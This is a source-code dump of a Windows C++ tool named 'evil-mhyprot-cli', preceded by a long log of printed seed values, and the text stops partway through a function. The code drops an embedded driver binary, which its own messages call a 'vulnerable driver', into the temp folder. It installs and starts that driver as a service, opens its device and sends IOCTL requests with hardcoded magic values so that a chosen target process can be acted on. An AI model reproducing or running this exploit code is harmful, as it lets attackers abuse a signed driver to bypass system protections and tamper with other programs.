[+] seedmap (00029): 0xA6F0E1917CD0A9CB
[+] seedmap (00030): 0xF423E49A394ADF36
[+] seedmap (00031): 0x134E5130AC489E2B
[+] seedmap (00032): 0xBC26355A38BFF31F
[+] seedmap (00033): 0x5385BEA7161DCCB0
[+] seedmap (00034): 0x66B8C4197D069B39
[+] seedmap (00035): 0x3E6C0D813C18CF6
[+] seedmap (00036): 0x1F62FA9E3FA45F17
[+] seedmap (00037): 0x8E4F30793B7DE1CF
[+] seedmap (00038): 0x3C2CD1ADBEABC5F1
[+] seedmap (00039): 0x6230E7EEB78CF9C0
[+] seedmap (00040): 0x673A319E34014259
[+] seedmap (00041): 0xD219EA1CE57D1178
[+] seedmap (00042): 0xB3B726B418AA1576
[+] seedmap (00043): 0x4875DB1D7D77743D
[+] seedmap (00044): 0xFFF84B1C618B8D0E
[+] seedmap (00045): 0x2E2D99BC07CE36D3
[+] seedmap (00046): 0x8FF0275A567CD4C7
[+] seedmap (00047): 0x6DD8C705F257436
[+] seedmap (00048): 0x45A768A36B14EE6
[+] seedmap (00049): 0xB203641046C2030
[+] seedmap (00050): 0x2E44072CF872115F
[+] seedmap (00051): 0xA2DADAB0245AFA93
[+] seedmap (00052): 0x3788DB3419D7CE35
[+] seedmap (00053): 0xECFF1EC16BFDDE6C
[+] seedmap (00054): 0xEE2B04207D1B6FC2
[+] seedmap (00055): 0x3CF961415CEB8B5C
[+] seedmap (00056): 0xF2CB32B581D323BD
[+] seedmap (00057): 0xE54977E1599520DD
[+] seedmap (00058): 0x4E90B385E19E755F
[+] seedmap (00059): 0xB40697E098F3A756
[+] seedmap (00060): 0xA095F2B551B5921E
[+] seedmap (00061): 0x56BDA82AEB40D24
[+] seedmap (00062): 0x9F87D8792A74A1DD
[+] seedmap (00063): 0x5A8E56903E44A7D3
[+] seedmap (00064): 0x76FBBF43D68FB0F8
[+] seedmap (00065): 0x7101B715AC2E837A
[+] seedmap (00066): 0xBD95413D14633EC9
[+] seedmap (00067): 0xF7EB672868FD3187
[+] seedmap (00068): 0xF21C3B98903FFF6F
[+] seedmap (00069): 0x45B98D3BCC21D13E
[+] seedmap (00070): 0x95116229FE978F9
[+] seedmap (00071): 0x72B3361CA7E421F7
[+] seedmap (00072): 0x77762DB886890C07
[+] seedmap (00073): 0x7FF0FC70C4F54B05
[+] seedmap (00074): 0x3F3B1DF0601C18FC
[+] seedmap (00075): 0x5537CA91AA3E3485
[+] seedmap (00076): 0x164D5DFF724AD4D3
[+] seedmap (00077): 0xE60C330CE534CE5E
[+] seedmap (00078): 0x22331C99FE177437
[+] seedmap (00079): 0xA3F40E5C273FD2C9
[+] seedmap (00080): 0xF06668F394CA35B7
[+] seedmap (00081): 0x192B2C5695512D00
[+] seedmap (00082): 0x9F48C73294F6F652
[+] seedmap (00083): 0xECE85DB0B276FA35
[+] seedmap (00084): 0x1FF95B207149EC3E
[+] seedmap (00085): 0x9C085209FC18F823
[+] seedmap (00086): 0x2FD23C0E221C216B
[+] seedmap (00087): 0xB23023FD0CDE8C99
[+] seedmap (00088): 0xA7FBC16904A93714
[+] seedmap (00089): 0x2407B5908FE31552
[+] seedmap (00090): 0xF6E623BA599D9639
[+] seedmap (00091): 0xDF15A727389D65D7
[+] seedmap (00092): 0x29079E90B1D1E7E2
[+] seedmap (00093): 0x4D768784BC79D7F1
[+] seedmap (00094): 0xE389942538A1AB8C
[+] seedmap (00095): 0x13D90A5E9ACBAC4F
[+] seedmap (00096): 0xFE4BE954FFEA0306
[+] seedmap (00097): 0x80E0957230CD62FF
[+] seedmap (00098): 0x9DA46D2E2CA40DB8
[+] seedmap (00099): 0xB58156769A7CF66F
[+] seedmap (00100): 0x4862F529CB4B0851
[+] seedmap (00101): 0x7F3D4D2DD5546CCF
[+] seedmap (00102): 0x3787F6FDE687AEDC
[+] seedmap (00103): 0x245F96D1E4B94B0E
[+] seedmap (00104): 0xF61857F615DEFBDF
[+] seedmap (00105): 0x8141E9AD4AA85C39
[+] seedmap (00106): 0xCC38DA3EB2CF7003
[+] seedmap (00107): 0x1BE6F6B385457006
[+] seedmap (00108): 0x2C1D111C6DCF084C
[+] seedmap (00109): 0x1A68F7ABC96241F4
[+] seedmap (00110): 0xC3E3C0230FDD0B1E
[+] seedmap (00111): 0x22FC7D7D4F48AA7C
[+] seedmap (00112): 0xDE3EB82327668254
[+] seedmap (00113): 0xABA28FB0E9B235D0
[+] seedmap (00114): 0x2E90DD8524E8E94
[+] seedmap (00115): 0x168C6E21FB5CB00C
[+] seedmap (00116): 0x89E2F0EDA4FE06F7
[+] seedmap (00117): 0x399DFA134BB0E9A0
[+] seedmap (00118): 0x62A497333A4FED20
[+] seedmap (00119): 0x4E8C79CD10A4D414
[+] seedmap (00120): 0xFA4F6DA6EAA5C038
[+] seedmap (00121): 0x903379CBE4AF931D
[+] seedmap (00122): 0xE87A818E769BBAE
[+] seedmap (00123): 0x662D7C7D97EF01A6
[+] seedmap (00124): 0x8352825F617FF286
[+] seedmap (00125): 0xE22D27D72EE7EA0E
[+] seedmap (00126): 0x472BCFC10FFE8B5
[+] seedmap (00127): 0x346E620A41668D8B
[+] seedmap (00128): 0x9710706663461817
[+] seedmap (00129): 0x1F0B5355DEB282F2
[+] seedmap (00130): 0x96F97289A8B3866F
[+] seedmap (00131): 0x23AD9C984CFE6CBC
[+] seedmap (00132): 0x26B57C58BDEDCD90
[+] seedmap (00133): 0xB53D1EDECCB6E88C
[+] seedmap (00134): 0x260286028A383024
[+] seedmap (00135): 0xC0CFBFE0C8025E47
[+] seedmap (00136): 0x50CDF89981AEBD50
[+] seedmap (00137): 0x5A1864A09B5E5C30
[+] seedmap (00138): 0x56A9CD572D85AD78
[+] seedmap (00139): 0x78530F9E3A077B48
[+] seedmap (00140): 0x7D4E1232B6D03E2C
[+] seedmap (00141): 0xC62BCE8DA7964F49
[+] seedmap (00142): 0xDCD50F85E428D577
[+] seedmap (00143): 0x48C1A0445DB43996
[+] seedmap (00144): 0xFEBA7D3D3E02B250
[+] seedmap (00145): 0x538BC55D1813DA82
[+] seedmap (00146): 0xC596112210217E4A
[+] seedmap (00147): 0x384C73207D99C660
[+] seedmap (00148): 0x9A35797645709138
[+] seedmap (00149): 0x1E4A2ED2B1AE9909
[+] seedmap (00150): 0x250612C83EA9FCB
[+] seedmap (00151): 0x5D16E89902747F16
[+] seedmap (00152): 0xD21A41871E4FC00
[+] seedmap (00153): 0xF8B34CE7E67E0F28
[+] seedmap (00154): 0x9BF6F51CE1D08103
[+] seedmap (00155): 0x7FC3999C7F22678B
[+] seedmap (00156): 0x8FDF5C7DB7D910B2
[+] seedmap (00157): 0xEA560F9436CF940F
[+] seedmap (00158): 0x47B3E914BB28FF36
[+] seedmap (00159): 0xB121A321E3778798
[+] seedmap (00160): 0x4C93142375BA2180
[+] seedmap (00161): 0xC33837ACEF53D5B5
[+] seedmap (00162): 0x143AA1FAEC283CB
[+] seedmap (00163): 0xB70B4CD6A0527D1E
[+] seedmap (00164): 0xB89D8AA82FAF9341
[+] seedmap (00165): 0x8B3DC4D600288C4E
[+] seedmap (00166): 0x4A67E772CCF1FA06
[+] seedmap (00167): 0x85AFBD01308186D3
[+] seedmap (00168): 0x387CE3DDDE4D3A63
[+] seedmap (00169): 0x23CA063413418E5F
[+] seedmap (00170): 0x71FD61F7EADDBDDF
[+] seedmap (00171): 0xCABDAEB6A41B2B75
[+] seedmap (00172): 0x4FFFB8FFC3E5872B
[+] seedmap (00173): 0x3DA4AEB840439175
[+] seedmap (00174): 0x43AFC6B5AAF3E8B6
[+] seedmap (00175): 0x339EB148E946FF4E
[+] seedmap (00176): 0x5FEE0CD81E1105F4
[+] seedmap (00177): 0xA97F3918DE8BEB55
[+] seedmap (00178): 0x879DC71880059BBE
[+] seedmap (00179): 0xBCB788FACF4D214
[+] seedmap (00180): 0x1FC3D567C159A514
[+] seedmap (00181): 0xB7E16B0F64B168F7
[+] seedmap (00182): 0xEC4D4E5FA2529CAC
[+] seedmap (00183): 0x8A0D414F6436473
[+] seedmap (00184): 0xA38709DC92E96B50
[+] seedmap (00185): 0x5AB23D245F7F3DAE
[+] seedmap (00186): 0xF2829AF54227CAA6
[+] seedmap (00187): 0x98AF26DB87D77D86
[+] seedmap (00188): 0xFF9335DE2D330A09
[+] seedmap (00189): 0x5FC6FC166D3A7F8D
[+] seedmap (00190): 0x9016B339ADB1C73B
[+] seedmap (00191): 0x37ECF9A562FE5359
[+] seedmap (00192): 0x292952C59CF3BDAD
[+] seedmap (00193): 0x568912582314A7F0
[+] seedmap (00194): 0xAE6991C75800DEE7
[+] seedmap (00195): 0x1840657056D770C8
[+] seedmap (00196): 0x55CF1D437A058C38
[+] seedmap (00197): 0xDD66D7B6A6D27708
[+] seedmap (00198): 0x8FCCC276378B44DC
[+] seedmap (00199): 0xC22FDD72E28A1D08
[+] seedmap (00200): 0xFDAADB4A3D2D37A9
[+] seedmap (00201): 0x207D6B7AB0D49E13
[+] seedmap (00202): 0x6020946F92A6A47C
[+] seedmap (00203): 0xBF9F05127B219CB9
[+] seedmap (00204): 0xC8935045DACEDF8E
[+] seedmap (00205): 0xA50C5CE5589E8473
[+] seedmap (00206): 0xF728C2C0CCD024C0
[+] seedmap (00207): 0x1CB364C851BFF9C6
[+] seedmap (00208): 0x62B8796EC64CF80D
[+] seedmap (00209): 0x3D13C377ED3D4881
[+] seedmap (00210): 0xA19AE29ADC753123
[+] seedmap (00211): 0xB624B24939359E38
[+] seedmap (00212): 0xBED17FC68F894B20
[+] seedmap (00213): 0xF0C42DF546BE67D9
[+] seedmap (00214): 0xF52DDD34B0D214A9
[+] seedmap (00215): 0x51A49B9C195B01F7
[+] seedmap (00216): 0x3770C2BD8AF7D3E3
[+] seedmap (00217): 0xAD13F199B5D6334A
[+] seedmap (00218): 0x5AC822F7A046D4CF
[+] seedmap (00219): 0xAF92A41B349153CC
[+] seedmap (00220): 0x24DDF7251233AD88
[+] seedmap (00221): 0x73E046F965F53E65
[+] seedmap (00222): 0xDE17021F4B51DE85
[+] seedmap (00223): 0xEB76BE39FD8E104B
[+] seedmap (00224): 0x88A5BD3AC1A29B7F
[+] seedmap (00225): 0x402E123BB15D750
[+] seedmap (00226): 0xB4336F689FD4D2D7
[+] seedmap (00227): 0xD2B9611F6EEE2B1D
[+] seedmap (00228): 0x77262374EDFE9897
[+] seedmap (00229): 0xF6CACCC679401FB5
[+] seedmap (00230): 0x750837DEA71A187E
[+] seedmap (00231): 0x400E78C0B3C6A1CB
[+] seedmap (00232): 0x69C835C65640FB3D
[+] seedmap (00233): 0xA14F27EB18983026
[+] seedmap (00234): 0x4CDEAC962649F666
[+] seedmap (00235): 0x73D58D46A444933C
[+] seedmap (00236): 0x233CB49A6713CCD1
[+] seedmap (00237): 0xAB15DF080D901ED9
[+] seedmap (00238): 0xCBC47ABD3DD68FF9
[+] seedmap (00239): 0xF482E75959EEC2B2
[+] seedmap (00240): 0x3167C3F9FFE344F4
[+] seedmap (00241): 0x2D3BDC50CE6405B
[+] seedmap (00242): 0x3C1DF07551B734E6
[+] seedmap (00243): 0xA3090E7F170A31DA
[+] seedmap (00244): 0xD002632E5754F5BF
[+] seedmap (00245): 0xA9047406387AC19B
[+] seedmap (00246): 0x2DC0528DF914E198
[+] seedmap (00247): 0xBB065D039BD4FF86
[+] seedmap (00248): 0x4B18F2575F8977C1
[+] seedmap (00249): 0x55BD413521086455
[+] seedmap (00250): 0x5C1D724942494234
[+] seedmap (00251): 0x2794D4881EB6C1F4
[+] seedmap (00252): 0x3F4E4BC8E318ADF
[+] seedmap (00253): 0x35FCCE046FBF9393
[+] seedmap (00254): 0xDC18863FE08116F2
[+] seedmap (00255): 0x3A0E6A95F876AD9E
[+] seedmap (00256): 0x259F2930AE2CD2D
[+] seedmap (00257): 0xA254DEA94BEE0F36
[+] seedmap (00258): 0xBC6E50FD727ED264
[+] seedmap (00259): 0x86CB2B7A9F68ECB2
[+] seedmap (00260): 0x69B73625C9894245
[+] seedmap (00261): 0xB0F6313DF5E91D83
[+] seedmap (00262): 0xAAF6073058F962FA
[+] seedmap (00263): 0x8E189951B001F530
[+] seedmap (00264): 0x652E6EC114A77D6D
[+] seedmap (00265): 0x41C5A1D9DC7536D1
[+] seedmap (00266): 0x7DE1F0B90B7F5FF1
[+] seedmap (00267): 0x94B1407ED6AEF7BF
[+] seedmap (00268): 0xC87D6587947F132B
[+] seedmap (00269): 0x71BA95352798F97A
[+] seedmap (00270): 0x8F60AE3271642D33
[+] seedmap (00271): 0xA61D24A0CFA09831
[+] seedmap (00272): 0x9983181A2D7FA894
[+] seedmap (00273): 0x331AE289AF5D2D50
[+] seedmap (00274): 0x2967FE0BF41005D
[+] seedmap (00275): 0x8F0ADBC34325CF11
[+] seedmap (00276): 0xA224431A41EF16F2
[+] seedmap (00277): 0x9CD4EF33DCE86B10
[+] seedmap (00278): 0xB1359DACDA49AF93
[+] seedmap (00279): 0xC9DC14154D524229
[+] seedmap (00280): 0x460561E6E94316C8
[+] seedmap (00281): 0x2CF90CA973D43B6
[+] seedmap (00282): 0x86FE50320E51DC96
[+] seedmap (00283): 0x93F1440249C496C4
[+] seedmap (00284): 0x19B3FF553542D042
[+] seedmap (00285): 0x21FB13FC5265A069
[+] seedmap (00286): 0x3B54414FA5E76548
[+] seedmap (00287): 0xD62569DD59B0F2DC
[+] seedmap (00288): 0x7112A6F8AB22C69F
[+] seedmap (00289): 0xB4A97A0A502A8BB8
[+] seedmap (00290): 0x14482D9EBA7ACC68
[+] seedmap (00291): 0x57887BEC24128A2A
[+] seedmap (00292): 0xC89A6AFA1B62387F
[+] seedmap (00293): 0xE60E3BE29474CD2E
[+] seedmap (00294): 0x9AF28D387677A940
[+] seedmap (00295): 0x19F857B202E4156C
[+] seedmap (00296): 0xD3912E1341241F2D
[+] seedmap (00297): 0xE940B59F4F615614
[+] seedmap (00298): 0xFF8E1C066A588DF2
[+] seedmap (00299): 0xC46E4ADE998F6AF2
[+] seedmap (00300): 0x26D62ABDA3B9248B
[+] seedmap (00301): 0x324C1BB829B8A30C
[+] seedmap (00302): 0xA8F727D0B6D9711B
[+] seedmap (00303): 0xFC8C1F91EDF1FEB7
[+] seedmap (00304): 0xC108092E71912AF
[+] seedmap (00305): 0xF0667533ED506962
[+] seedmap (00306): 0x9B67616DA2EE0C51
[+] seedmap (00307): 0x3436BABB4A2E9BB2
[+] seedmap (00308): 0x2F16767648C2B105
[+] seedmap (00309): 0xAF1EABC9293A8967
[+] seedmap (00310): 0xA10159AB12220C16
[+] seedmap (00311): 0x1930F141DA300F37
================================================
FILE: src/evil-mhyprot-cli.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="win_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="mhyprot.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="service_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="file_utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="raw_driver.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="logger.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="win_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="mhyprot.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="service_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="file_utils.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="nt.hpp">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="sup.hpp">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
</Project>
================================================
FILE: src/evil-mhyprot-cli.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<Keyword>Win32Proj</Keyword>
<ProjectGuid>{0d17a4b4-a7c4-49c0-99e3-b856f9f3b271}</ProjectGuid>
<RootNamespace>mhyprotrootkit</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<ProjectName>evil-mhyprot-cli</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>MultiByte</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<LanguageStandard>stdcpp17</LanguageStandard>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="file_utils.cpp" />
<ClCompile Include="main.cpp" />
<ClCompile Include="mhyprot.cpp" />
<ClCompile Include="service_utils.cpp" />
<ClCompile Include="win_utils.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="file_utils.hpp" />
<ClInclude Include="logger.hpp" />
<ClInclude Include="mhyprot.hpp" />
<ClInclude Include="nt.hpp" />
<ClInclude Include="raw_driver.hpp" />
<ClInclude Include="service_utils.hpp" />
<ClInclude Include="sup.hpp" />
<ClInclude Include="win_utils.hpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: src/file_utils.cpp
================================================
#include "file_utils.hpp"
//
// create file from memory
//
bool file_utils::create_file_from_buffer(
const std::string_view file_path, void* buffer, size_t size
)
{
std::ofstream stream(
file_path.data(),
std::ios_base::out | std::ios_base::binary
);
if (!stream.write((char*)buffer, size))
{
stream.close();
return false;
}
stream.close();
return true;
}
================================================
FILE: src/file_utils.hpp
================================================
#pragma once
#include <Windows.h>
#include <string>
#include <fstream>
namespace file_utils
{
bool create_file_from_buffer(const std::string_view file_path, void* buffer, size_t size);
}
================================================
FILE: src/logger.hpp
================================================
#pragma once
#include <iostream>
#define LOG_ERROR() \
logger::log("[!] failed at in %s:%d, (0x%lX)\n", __FILE__, __LINE__, GetLastError())
namespace logger
{
template <typename ... T>
__forceinline void log(const char* format, T const& ... args)
{
printf(format, args ...);
}
}
================================================
FILE: src/main.cpp
================================================
#include <iostream>
#include "logger.hpp"
#include "win_utils.hpp"
#include "mhyprot.hpp"
#include "sup.hpp"
#define CONTAINS(src, part) (src.find(part) != std::string::npos)
#define PRINT_USAGE() \
logger::log("[-] incorrect usage\n"); \
logger::log("[+] usage: bin.exe [process name] [option]\n"); \
logger::log("[+] example: bin.exe notepad.exe -t\n"); \
logger::log("[+] options:\n"); \
logger::log(" multiple options are available\n"); \
logger::log(" t: test\n"); \
logger::log(" d: debug prints\n"); \
logger::log(" s: print seeds\n"); \
//
// main entry point of this cli
//
int main(int argc, const char** argv)
{
if (argc < 3)
{
PRINT_USAGE();
return -1;
}
const std::string option(argv[2]);
if (!CONTAINS(option, "-"))
{
PRINT_USAGE();
return -1;
}
//
// find process id
//
const uint32_t process_id = win_utils::find_process_id(argv[1]);
if (!process_id)
{
logger::log("[!] process \"%s\ was not found\n", argv[1]);
return -1;
}
logger::log("[+] %s (%d)\n", argv[1], process_id);
//
// initialize its service, etc
//
if (!mhyprot::init())
{
logger::log("[!] failed to initialize vulnerable driver\n");
return -1;
}
//
// initialize driver implementations
//
if (!mhyprot::driver_impl::driver_init(
CONTAINS(option, "d"), // print debug
CONTAINS(option, "s") // print seedmap
))
{
logger::log("[!] failed to initialize driver properly\n");
mhyprot::unload();
return -1;
}
//
// perform tests
//
if (CONTAINS(option, "t"))
sup::perform_tests(process_id);
mhyprot::unload();
logger::log("[<] done!\n");
return 0;
}
================================================
FILE: src/mhyprot.cpp
================================================
#include "mhyprot.hpp"
//
// initialization of its service and device
//
bool mhyprot::init()
{
logger::log("[>] loading vulnerable driver...\n");
char temp_path[MAX_PATH];
const uint32_t length = GetTempPath(sizeof(temp_path), temp_path);
if (length > MAX_PATH || !length)
{
logger::log("[!] failed to obtain temp path. (0x%lX)\n", GetLastError());
return false;
}
//
// place the driver binary into the temp path
//
const std::string placement_path = std::string(temp_path) + MHYPROT_SYSFILE_NAME;
if (std::filesystem::exists(placement_path))
{
std::remove(placement_path.c_str());
}
//
// create driver sys from memory
//
if (!file_utils::create_file_from_buffer(
placement_path,
(void*)resource::raw_driver,
sizeof(resource::raw_driver)
))
{
logger::log("[!] failed to prepare %s. (0x%lX)\n", MHYPROT_SYSFILE_NAME, GetLastError());
return false;
}
logger::log("[>] preparing service...\n");
//
// create service using winapi, this needs administrator privileage
//
detail::mhyplot_service_handle = service_utils::create_service(placement_path);
if (!CHECK_HANDLE(detail::mhyplot_service_handle))
{
logger::log("[!] failed to create service. (0x%lX)\n", GetLastError());
return false;
}
//
// start the service
//
if (!service_utils::start_service(detail::mhyplot_service_handle))
{
logger::log("[!] failed to start service. (0x%lX)\n", GetLastError());
return false;
}
logger::log("[<] %s prepared\n", MHYPROT_SYSFILE_NAME);
//
// open the handle of its driver device
//
detail::device_handle = CreateFile(
TEXT(MHYPROT_DEVICE_NAME),
GENERIC_READ | GENERIC_WRITE,
0,
nullptr,
OPEN_EXISTING,
NULL,
NULL
);
if (!CHECK_HANDLE(detail::device_handle))
{
logger::log("[!] failed to obtain device handle (0x%lX)\n", GetLastError());
return false;
}
logger::log("[+] device handle snatched (0x%llX)\n", detail::device_handle);
logger::log("[>] mhyprot initialized successfully\n");
return true;
}
void mhyprot::unload()
{
if (detail::device_handle)
{
CloseHandle(detail::device_handle);
}
if (detail::mhyplot_service_handle)
{
service_utils::stop_service(detail::mhyplot_service_handle);
service_utils::delete_service(detail::mhyplot_service_handle);
}
}
//
// send ioctl request to the vulnerable driver
//
bool mhyprot::driver_impl::request_ioctl(DWORD ioctl_code, LPVOID in_buffer, DWORD in_buffer_size)
{
//
// allocate memory for this command result
//
LPVOID out_buffer = calloc(1, in_buffer_size);
DWORD out_buffer_size;
if (!out_buffer)
{
return false;
}
//
// send the ioctl request
//
const bool result = DeviceIoControl(
mhyprot::detail::device_handle,
ioctl_code,
in_buffer,
in_buffer_size,
out_buffer,
in_buffer_size,
&out_buffer_size,
NULL
);
//
// store the result
//
if (out_buffer_size)
{
memcpy(in_buffer, out_buffer, out_buffer_size);
}
free(out_buffer);
return result;
}
//
// initialize driver implementations with payload encryption requirements
//
bool mhyprot::driver_impl::driver_init(bool debug_prints, bool print_seeds)
{
logger::log("[>] initializing driver...\n");
//
// the driver initializer
//
MHYPROT_INITIALIZE initializer;
initializer._m_002 = 0x0BAEBAEEC;
initializer._m_003 = 0x0EBBAAEF4FFF89042;
if (!request_ioctl(MHYPROT_IOCTL_INITIALIZE, &initializer, sizeof(initializer)))
{
logger::log("[!] failed to initialize mhyplot driver implementation\n");
return false;
}
//
